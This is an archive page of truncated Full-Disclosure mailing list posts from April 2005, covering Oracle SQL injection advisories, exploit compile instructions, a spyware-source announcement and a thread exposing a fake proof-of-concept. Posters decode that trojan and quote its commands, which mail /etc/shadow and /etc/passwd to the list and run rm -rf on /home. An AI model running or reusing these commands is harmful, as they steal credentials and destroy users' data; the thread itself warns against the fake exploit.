__Notice
I really wonder why the Mozilla Foundation decided to release a serious
security update on a friday night and to disclose the link to my
proof-of-concept code so quickly. It wasn't intendet from my side to release
this as a 0day exploit. Please complain to [EMAIL PROTECTED] if you
Fellows,
Try this:
Linux (Slackware 10):
[EMAIL PROTECTED]:/# gcc -D LINUX storm.c -lpcap -o storm
BSD systems:
[EMAIL PROTECTED]:/# gcc storm.c -lpcap -o storm
It should work, anyway Im sending a FreeBSD precompiled version of
this exploit and a the C source code as an attachment.
Compiles and runs ok on *BSD and Linux.
No effect on windows xp sp2 home/pro, Linux 2.4/2.6, NetBSD 2.0.2, DragonFly 1.2
No sign of DoS on either side of the connection.
No wonder people you sent the advisory to didn't bother to respond
--
-BEGIN PGP SIGNED MESSAGE-
__
SUSE Security Announcement
Package:cvs
Announcement-ID:SUSE-SA:2005:024
Date: Monday, Apr
Just mail John Cartwright... and politely ask to be removed.
-KF
Bill Phu wrote:
*sigh* I use [EMAIL PROTECTED] at
https://lists.grok.org.uk/mailman/listinfo/full-disclosure, and I am
brought to a page that reads:
---Start copy---
Full-Disclosure list: member options for user [EMAIL PROTECTED]
In
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 710-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 18th, 2005
I can confirm that the POC works on 1.0.2 and does not work on 1.0.3.
Michael Scovetta
Computer Associates
Senior Application Developer
-Original Message-
From: mikx [mailto:[EMAIL PROTECTED]
Sent: Monday, April 18, 2005 6:59 AM
To: full-disclosure@lists.grok.org.uk;
Hi,
Since a few years, the number of spywares is growing up but it's
impossible to find a spyware's code source to analyse it and better
understand their work.
After kruegerware's (and its child) diffusion, I'm introducing you the
first open source spyware.
My goal is not to help people writing
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Denial of Service in Oracle interMedia
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-01.html
April 18, 2005
Affected versions: Oracle Database Server versions 9i and 10g
Risk level: Medium
Credits:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multiple SQL Injection vulnerabilities in DBMS_CDC_SUBSCRIBE and
DBMS_CDC_ISUBSCRIBE packages
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-02.html
April 18, 2005
Affected Versions: Oracle Database
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-04.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in CREATE_SCN_CHANGE_SET procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-05.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Credits:
lol, I'm not doing a race...
Besides Agobot is not a spyware, it's a backdoor which exploit
RPC/DCOM (MS03-026), RPC/Locator (MS03-001) and WebDAV (MS03-007)
whereas kruegerware and kspyware are real spyware (it's right KSpyware
is not very dangerous, but kruegerware was very dangerous).
PS: I
Searching for security contacts for both Sambar and Surgemail. I've checked over the respective websites and have googled for contact details to no avail.
Cheers!
JamieSend instant messages to your online friends http://uk.messenger.yahoo.com ___
[EMAIL PROTECTED]
[EMAIL PROTECTED]
http://netwinsite.com/surgemail/infoq.htm
- Original Message -
From:
jamie fisher
To: full-disclosure@lists.grok.org.uk
Sent: Monday, April 18, 2005 3:21
PM
Subject: [Full-disclosure] Security
contacts for Sambar server and
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Denial of Service in Oracle interMedia
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-01.html
April 18, 2005
Affected versions: Oracle Database Server versions 9i and 10g
Risk level: Medium
Credits:
http://www.argeniss.com/research.html
Some exploits and workarounds for vulnerabilities
fixed on Oracle Critical Patch Update April 2005.
http://www.oracle.com/technology/deploy/security/pdf/cpuapr2005.pdf
(-Don't read if don't care about Oracle security...)
You think you are secure because
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multiple SQL Injection vulnerabilities in DBMS_METADATA package
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-03.html
April 18, 2005
Affected Versions: Oracle Database Server versions 9i and 10g
Risk
Saludos:
Good attempt;) But some times it works.
---
cat: /etc/shadow: Permiso denegado
No message, no subject; hope that's ok
/bin/rm: no se puede borrar «/home/*»: Permiso denegado
/bin/rm: no se puede borrar «/home/**»: Permiso denegado
/bin/rm: no se puede borrar
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-04.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Haxorcitos advisory
---
Application : WheresJames Webcam Publisher
Version : Beta 2.0.0014
Url : www.wheresjames.com
Type : Remote / Local Bof
Author : Miguel Tarascó Acuña - Tarako AT gmail.com
- Tarako AT Haxorcitos.com
Exploit/Poc : Attached
vpBof.c
Description: Binary
Le lundi 18 avril 2005 à 16:53 -0700, Day Jay a écrit :
/* Proof of concept code
Please don't send us e-mails
asking us how to hack because
we will be forced to skullfsck you.
DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
You're right to add this warning ! :)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in CREATE_SCN_CHANGE_SET procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-05.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Credits:
Not that anyone would fall for running this on anything besides a test
system, but to save 30 second to decode, what it really does (locally,
not remotely) is:
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
/bin/rm -rf
haha, nice:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
lol @ anybody who does it.
Day Jay wrote:
/* Proof of concept code
Please don't send us e-mails
asking us how to hack
25 matches
Mail list logo
